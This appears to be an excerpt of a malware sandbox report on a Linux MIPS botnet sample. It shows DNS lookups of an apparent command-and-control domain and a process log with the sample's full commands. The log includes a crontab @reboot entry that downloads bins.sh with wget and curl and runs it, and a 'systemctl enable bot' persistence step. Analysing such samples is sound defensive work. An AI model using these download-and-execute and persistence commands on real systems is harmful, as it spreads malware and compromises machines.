            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Nov 20, 2024 00:57:10.281671047 CET192.168.2.151.1.1.10xa863Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
            Nov 20, 2024 00:57:13.105171919 CET192.168.2.151.1.1.10x697cStandard query (0)motd.ubuntu.com28IN (0x0001)false
            Nov 20, 2024 00:57:14.814310074 CET192.168.2.151.1.1.10xe5ddStandard query (0)daisy.ubuntu.com28IN (0x0001)false
            Nov 20, 2024 00:57:14.814310074 CET192.168.2.151.1.1.10x1f3fStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
            Nov 20, 2024 00:57:15.291449070 CET192.168.2.151.1.1.10xa863Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
            Nov 20, 2024 00:57:19.818146944 CET192.168.2.151.1.1.10xe5ddStandard query (0)daisy.ubuntu.com28IN (0x0001)false
            Nov 20, 2024 00:57:20.294725895 CET192.168.2.151.1.1.10xa863Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
            Nov 20, 2024 00:57:24.853466034 CET192.168.2.151.1.1.10xe5ddStandard query (0)daisy.ubuntu.com28IN (0x0001)false
            Nov 20, 2024 00:57:25.318486929 CET192.168.2.151.1.1.10xa863Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
            Nov 20, 2024 00:57:28.603434086 CET192.168.2.158.8.8.80x697cStandard query (0)motd.ubuntu.com28IN (0x0001)false
            Nov 20, 2024 00:57:30.103337049 CET192.168.2.151.1.1.10xe5ddStandard query (0)daisy.ubuntu.com28IN (0x0001)false
            Nov 20, 2024 00:57:30.322328091 CET192.168.2.151.1.1.10xa863Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
            Nov 20, 2024 00:57:33.853220940 CET192.168.2.158.8.8.80x697cStandard query (0)motd.ubuntu.com28IN (0x0001)false
            Nov 20, 2024 00:57:35.353162050 CET192.168.2.151.1.1.10xe5ddStandard query (0)daisy.ubuntu.com28IN (0x0001)false
            Nov 20, 2024 00:57:39.103084087 CET192.168.2.158.8.8.80x697cStandard query (0)motd.ubuntu.com28IN (0x0001)false
            Nov 20, 2024 00:57:40.603032112 CET192.168.2.151.1.1.10xe5ddStandard query (0)daisy.ubuntu.com28IN (0x0001)false
            Nov 20, 2024 00:57:45.852890968 CET192.168.2.151.1.1.10xe5ddStandard query (0)daisy.ubuntu.com28IN (0x0001)false
            Nov 20, 2024 00:57:54.602704048 CET192.168.2.151.1.1.10x697cStandard query (0)motd.ubuntu.com28IN (0x0001)false
            Nov 20, 2024 00:57:55.329466105 CET192.168.2.151.1.1.10x8144Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
            Nov 20, 2024 00:58:00.333939075 CET192.168.2.151.1.1.10x8144Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
            Nov 20, 2024 00:58:05.337475061 CET192.168.2.151.1.1.10x8144Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
            Nov 20, 2024 00:58:10.102507114 CET192.168.2.151.1.1.10x697cStandard query (0)motd.ubuntu.com28IN (0x0001)false
            Nov 20, 2024 00:58:10.344284058 CET192.168.2.151.1.1.10x8144Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
            Nov 20, 2024 00:58:15.350584030 CET192.168.2.151.1.1.10x8144Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
            Nov 20, 2024 00:58:25.602057934 CET192.168.2.151.1.1.10x697cStandard query (0)motd.ubuntu.com28IN (0x0001)false
            Nov 20, 2024 00:58:30.851918936 CET192.168.2.158.8.8.80x697cStandard query (0)motd.ubuntu.com28IN (0x0001)false
            Nov 20, 2024 00:58:40.356251955 CET192.168.2.151.1.1.10x54baStandard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
            Nov 20, 2024 00:58:45.362133026 CET192.168.2.151.1.1.10x54baStandard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
            Nov 20, 2024 00:58:50.364598036 CET192.168.2.151.1.1.10x54baStandard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
            Nov 20, 2024 00:58:55.369680882 CET192.168.2.151.1.1.10x54baStandard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
            Nov 20, 2024 00:59:00.372886896 CET192.168.2.151.1.1.10x54baStandard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Nov 20, 2024 00:59:00.486759901 CET1.1.1.1192.168.2.150x54baNo error (0)host.zopz-api.com172.111.38.48A (IP address)IN (0x0001)false

            System Behavior

            Start time (UTC):23:57:05
            Start date (UTC):19/11/2024
            Path:/tmp/mipsel.elf
            Arguments:/tmp/mipsel.elf
            File size:5773336 bytes
            MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

            Start time (UTC):23:57:06
            Start date (UTC):19/11/2024
            Path:/tmp/mipsel.elf
            Arguments:-
            File size:5773336 bytes
            MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

            Start time (UTC):23:57:06
            Start date (UTC):19/11/2024
            Path:/tmp/mipsel.elf
            Arguments:-
            File size:5773336 bytes
            MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

            Start time (UTC):23:57:09
            Start date (UTC):19/11/2024
            Path:/tmp/mipsel.elf
            Arguments:-
            File size:5773336 bytes
            MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

            Start time (UTC):23:57:09
            Start date (UTC):19/11/2024
            Path:/tmp/mipsel.elf
            Arguments:-
            File size:5773336 bytes
            MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

            Start time (UTC):23:57:09
            Start date (UTC):19/11/2024
            Path:/tmp/mipsel.elf
            Arguments:-
            File size:5773336 bytes
            MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

            Start time (UTC):23:57:09
            Start date (UTC):19/11/2024
            Path:/bin/sh
            Arguments:sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):23:57:09
            Start date (UTC):19/11/2024
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):23:57:09
            Start date (UTC):19/11/2024
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):23:57:09
            Start date (UTC):19/11/2024
            Path:/usr/bin/crontab
            Arguments:crontab -l
            File size:43720 bytes
            MD5 hash:66e521d421ac9b407699061bf21806f5

            Start time (UTC):23:57:09
            Start date (UTC):19/11/2024
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):23:57:09
            Start date (UTC):19/11/2024
            Path:/usr/bin/chmod
            Arguments:chmod +x bins.sh
            File size:63864 bytes
            MD5 hash:739483b900c045ae1374d6f53a86a279

            Start time (UTC):23:57:09
            Start date (UTC):19/11/2024
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):23:57:09
            Start date (UTC):19/11/2024
            Path:/usr/bin/sh
            Arguments:sh bins.sh
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):23:57:09
            Start date (UTC):19/11/2024
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):23:57:09
            Start date (UTC):19/11/2024
            Path:/bin/curl
            Arguments:/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
            File size:239848 bytes
            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

            Start time (UTC):23:57:11
            Start date (UTC):19/11/2024
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):23:57:11
            Start date (UTC):19/11/2024
            Path:/usr/bin/chmod
            Arguments:chmod +x bins.sh
            File size:63864 bytes
            MD5 hash:739483b900c045ae1374d6f53a86a279

            Start time (UTC):23:57:11
            Start date (UTC):19/11/2024
            Path:/usr/bin/sh
            Arguments:sh bins.sh
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):23:57:09
            Start date (UTC):19/11/2024
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):23:57:09
            Start date (UTC):19/11/2024
            Path:/usr/bin/crontab
            Arguments:crontab -
            File size:43720 bytes
            MD5 hash:66e521d421ac9b407699061bf21806f5

            Start time (UTC):23:57:11
            Start date (UTC):19/11/2024
            Path:/tmp/mipsel.elf
            Arguments:-
            File size:5773336 bytes
            MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

            Start time (UTC):23:57:11
            Start date (UTC):19/11/2024
            Path:/bin/sh
            Arguments:sh -c "/bin/systemctl enable bot"
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):23:57:11
            Start date (UTC):19/11/2024
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):23:57:11
            Start date (UTC):19/11/2024
            Path:/bin/systemctl
            Arguments:/bin/systemctl enable bot
            File size:996584 bytes
            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

            Start time (UTC):23:57:11
            Start date (UTC):19/11/2024
            Path:/usr/lib/systemd/systemd
            Arguments:-
            File size:1620224 bytes
            MD5 hash:9b2bec7092a40488108543f9334aab75

            Start time (UTC):23:57:11
            Start date (UTC):19/11/2024
            Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
            Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
            File size:22760 bytes
            MD5 hash:3633b075f40283ec938a2a6a89671b0e